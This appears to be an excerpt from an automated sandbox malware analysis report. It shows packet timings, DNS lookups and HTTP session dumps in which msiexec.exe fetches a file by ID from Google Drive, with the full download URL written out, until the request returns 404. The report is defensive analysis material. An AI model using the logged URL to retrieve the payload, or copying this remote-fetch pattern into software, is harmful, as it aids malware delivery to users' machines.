                                      Dec 3, 2024 16:42:21.271790981 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:21.272459030 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:21.272532940 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:21.274442911 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:21.274456024 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:21.274709940 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:21.274769068 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:21.275171995 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:21.319329977 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:22.214061022 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:22.214164972 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:22.214194059 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:22.214253902 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:22.214319944 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:22.214361906 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:22.214416027 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:22.225106001 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:22.225152969 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:22.225246906 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:22.225491047 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:22.225506067 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:23.973012924 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:23.973237038 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:23.973839045 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:23.973846912 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:23.973999977 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:23.974005938 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:24.964241982 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:24.964346886 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:24.964621067 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:24.964679956 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:24.965007067 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:24.965049982 CET44349914142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:24.965097904 CET49914443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:25.089994907 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:25.090025902 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:25.090106964 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:25.090347052 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:25.090362072 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:26.837862015 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:26.837935925 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:26.838644028 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:26.838689089 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:26.840437889 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:26.840450048 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:26.840703011 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:26.840745926 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:26.841135979 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:26.883336067 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:27.761795044 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:27.761852980 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:27.761877060 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:27.761971951 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:27.762013912 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:27.762053013 CET44349923172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:27.762160063 CET49923443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:27.773058891 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:27.773099899 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:27.773233891 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:27.773472071 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:27.773485899 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:29.562369108 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:29.562464952 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:29.564086914 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:29.564095974 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:29.564340115 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:29.564419985 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:29.564703941 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:29.607331038 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:30.595010996 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:30.595079899 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:30.595716953 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:30.595813990 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:30.595851898 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:30.595912933 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:30.595983028 CET44349930142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:30.595989943 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:30.596028090 CET49930443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:30.714859962 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:30.714895964 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:30.715001106 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:30.715272903 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:30.715285063 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:32.505728006 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:32.505841017 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:32.506509066 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:32.506618977 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:32.508311033 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:32.508323908 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:32.508567095 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:32.508625031 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:32.509305000 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:32.555330038 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:33.454410076 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:33.454489946 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:33.454648972 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:33.454696894 CET44349937172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:33.454747915 CET49937443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:33.470314980 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:33.470360994 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:33.470434904 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:33.470664978 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:33.470674992 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:35.258517027 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:35.258599043 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:35.259006977 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:35.259012938 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:35.259192944 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:35.259197950 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.236358881 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.236423969 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.236437082 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.236479044 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.237232924 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.237278938 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.237287998 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.237308979 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.237329006 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.237359047 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.274185896 CET49945443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:36.274199009 CET44349945142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:36.438224077 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:36.438277960 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:36.438373089 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:36.438606024 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:36.438621044 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:38.223736048 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:38.223906994 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:38.224543095 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:38.224611998 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:38.226509094 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:38.226515055 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:38.226775885 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:38.226840019 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:38.227241993 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:38.271327972 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.151551008 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.151851892 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:39.151870966 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.151917934 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:39.152789116 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.152836084 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.152971029 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:39.247704029 CET49952443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:39.247734070 CET44349952172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:39.284292936 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:39.284332991 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:39.284574032 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:39.284809113 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:39.284837961 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:41.039474010 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:41.039649010 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:41.040152073 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:41.040157080 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:41.040319920 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:41.040323973 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:42.005429029 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:42.005496979 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:42.006074905 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:42.006119967 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:42.006150961 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:42.006232977 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:42.006278038 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:42.006297112 CET44349960142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:42.006364107 CET49960443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:42.137152910 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:42.137192965 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:42.137314081 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:42.137885094 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:42.137898922 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:43.882951021 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:43.883050919 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:43.917790890 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:43.917804003 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:43.917989969 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:43.917995930 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:44.794728041 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:44.794922113 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:44.794936895 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:44.795099020 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:44.795169115 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:44.795212030 CET44349966172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:44.795269966 CET49966443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:44.805253029 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:44.805313110 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:44.805382967 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:44.805634975 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:44.805650949 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:46.592784882 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:46.592879057 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:46.711179972 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:46.711205006 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:46.711612940 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:46.711677074 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:46.711997986 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:46.759336948 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.645054102 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.645226002 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:47.645524979 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.645610094 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:47.645697117 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.645742893 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.645806074 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:47.646049023 CET49973443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:47.646064997 CET44349973142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:47.779171944 CET49977443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:47.779217958 CET44349977172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:47.779331923 CET49977443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:47.779577017 CET49977443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:47.779596090 CET44349977172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:49.518132925 CET44349977172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:49.518199921 CET49977443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:49.518918037 CET44349977172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:49.519015074 CET49977443192.168.2.10172.217.19.174
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 3, 2024 16:42:13.599230051 CET5559053192.168.2.101.1.1.1
                                      Dec 3, 2024 16:42:13.737643957 CET53555901.1.1.1192.168.2.10
                                      Dec 3, 2024 16:42:16.503334999 CET6013453192.168.2.101.1.1.1
                                      Dec 3, 2024 16:42:16.645306110 CET53601341.1.1.1192.168.2.10
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 3, 2024 16:42:13.599230051 CET192.168.2.101.1.1.10xbb89Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Dec 3, 2024 16:42:16.503334999 CET192.168.2.101.1.1.10x4ce5Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 3, 2024 16:40:40.116894960 CET1.1.1.1192.168.2.100x6151No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Dec 3, 2024 16:40:40.116894960 CET1.1.1.1192.168.2.100x6151No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                      Dec 3, 2024 16:42:13.737643957 CET1.1.1.1192.168.2.100xbb89No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                      Dec 3, 2024 16:42:16.645306110 CET1.1.1.1192.168.2.100x4ce5No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                      • drive.google.com
                                      • drive.usercontent.google.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.1049893172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:15 UTC216OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-12-03 15:42:16 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:16 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Content-Security-Policy: script-src 'nonce-vbw9h7Qfz-QAqqZiTAsDUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.1049902142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:18 UTC258OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-12-03 15:42:19 UTC2229INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:18 GMT
                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                      Content-Security-Policy: script-src 'nonce-TFpLPA0WypS0dwviuLEwkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC7oyf3B5RRcR_my8haiXXmYfXG8_TpZwm3qMJpfW6YDlEmL3rvvM0n5ovD3NXSRxA5DD8ZyPEaZhA
                                      Server: UploadServer
                                      Set-Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa; expires=Wed, 04-Jun-2025 15:42:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 74 5a 63 4f 52 73 47 50 57 57 4a 65 58 63 62 4b 65 45 47 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="atZcORsGPWWJeXcbKeEGrg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.1049908172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:21 UTC418OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:22 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:21 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-Q270tHEVf-g3aA-QIZnljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
